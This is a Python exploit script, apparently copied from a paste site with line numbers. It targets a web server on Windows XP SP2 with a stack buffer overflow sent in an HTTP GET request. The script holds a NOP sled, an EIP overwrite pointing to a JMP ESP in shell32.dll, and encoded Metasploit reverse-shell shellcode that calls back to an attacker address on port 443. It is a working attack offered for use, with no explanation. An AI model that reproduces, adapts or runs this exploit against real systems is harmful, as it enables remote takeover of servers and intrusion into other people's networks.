#!/usr/bin/pythonimport sockettarget_address="192.168.2.7"target_por

1.  
2. #!/usr/bin/python
3.  
4. import socket
5.  
6. target_address="192.168.2.7"
7. target_port=80
8.  
9. buffer = "GET "
10. buffer+= "\x90" * 1787
11. buffer+= "\xF3\x30\x9D\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7C9D30F3.
12. # msfpayload windows/shell_reverse_tcp LHOST=192.168.2.15 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342 bytes
13. buffer+= "\x90" * 16
14. buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23" "\x31\xc9\xba\xb6\x11\x96\xe7\xd9\xc5\xd9\x74\x24\xf4\x5e\xb1" "\x4f\x31\x56\x13\x03\x56\x13\x83\xee\xfc\xe2\x43\xed\x7e\x6e"
15. "\xab\x0e\x7f\x11\x22\xeb\x4e\x03\x50\x7f\xe2\x93\x13\x2d\x0f"
16. "\x5f\x71\xc6\x84\x2d\x5d\xe9\x2d\x9b\xbb\xc4\xae\x2d\x03\x8a"
17. "\x6d\x2f\xff\xd1\xa1\x8f\x3e\x1a\xb4\xce\x07\x47\x37\x82\xd0"
18. "\x03\xea\x33\x55\x51\x37\x35\xb9\xdd\x07\x4d\xbc\x22\xf3\xe7"
19. "\xbf\x72\xac\x7c\xf7\x6a\xc6\xdb\x27\x8a\x0b\x38\x1b\xc5\x20"
20. "\x8b\xe8\xd4\xe0\xc5\x11\xe7\xcc\x8a\x2c\xc7\xc0\xd3\x69\xe0"
21. "\x3a\xa6\x81\x12\xc6\xb1\x52\x68\x1c\x37\x46\xca\xd7\xef\xa2"
22. "\xea\x34\x69\x21\xe0\xf1\xfd\x6d\xe5\x04\xd1\x06\x11\x8c\xd4"
23. "\xc8\x93\xd6\xf2\xcc\xf8\x8d\x9b\x55\xa5\x60\xa3\x85\x01\xdc"
24. "\x01\xce\xa0\x09\x33\x8d\xac\xfe\x0e\x2d\x2d\x69\x18\x5e\x1f"
25. "\x36\xb2\xc8\x13\xbf\x1c\x0f\x53\xea\xd9\x9f\xaa\x15\x1a\xb6"
26. "\x68\x41\x4a\xa0\x59\xea\x01\x30\x65\x3f\x85\x60\xc9\x90\x66"
27. "\xd0\xa9\x40\x0f\x3a\x26\xbe\x2f\x45\xec\xc9\x77\xd1\xcf\x62"
28. "\x75\x2e\xb8\x70\x7a\x31\x83\xfc\x9c\x5b\xe3\xa8\x37\xf3\x9a"
29. "\xf0\xcc\x62\x62\x2f\x44\x07\xf1\xb4\x95\x4e\xea\x62\xc1\x07"
30. "\xdc\x7a\x87\xb5\x47\xd5\xba\x44\x11\x1e\x7e\x92\xe2\xa1\x7e"
31. "\x57\x5e\x86\x90\xa1\x5f\x82\xc4\x7d\x36\x5c\xb3\x3b\xe0\x2e"
32. "\x6d\x95\x5f\xf9\xf9\x60\xac\x3a\x7c\x6d\xf9\xcc\x60\xdf\x54"
33. "\x89\x9f\xef\x30\x1d\xe7\x12\xa1\xe2\x32\x97\xd1\xa8\x1f\xb1"
34. "\x79\x75\xca\x80\xe7\x86\x20\xc6\x11\x05\xc1\xb6\xe5\x15\xa0"
35. "\xb3\xa2\x91\x58\xc9\xbb\x77\x5f\x7e\xbb\x5d\x55")
36.  
37. buffer+= " HTTP/1.1\r\n\r\n"
38.  
39. sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
40. connect=sock.connect((target_address,target_port))
41. sock.send(buffer)
42. sock.close()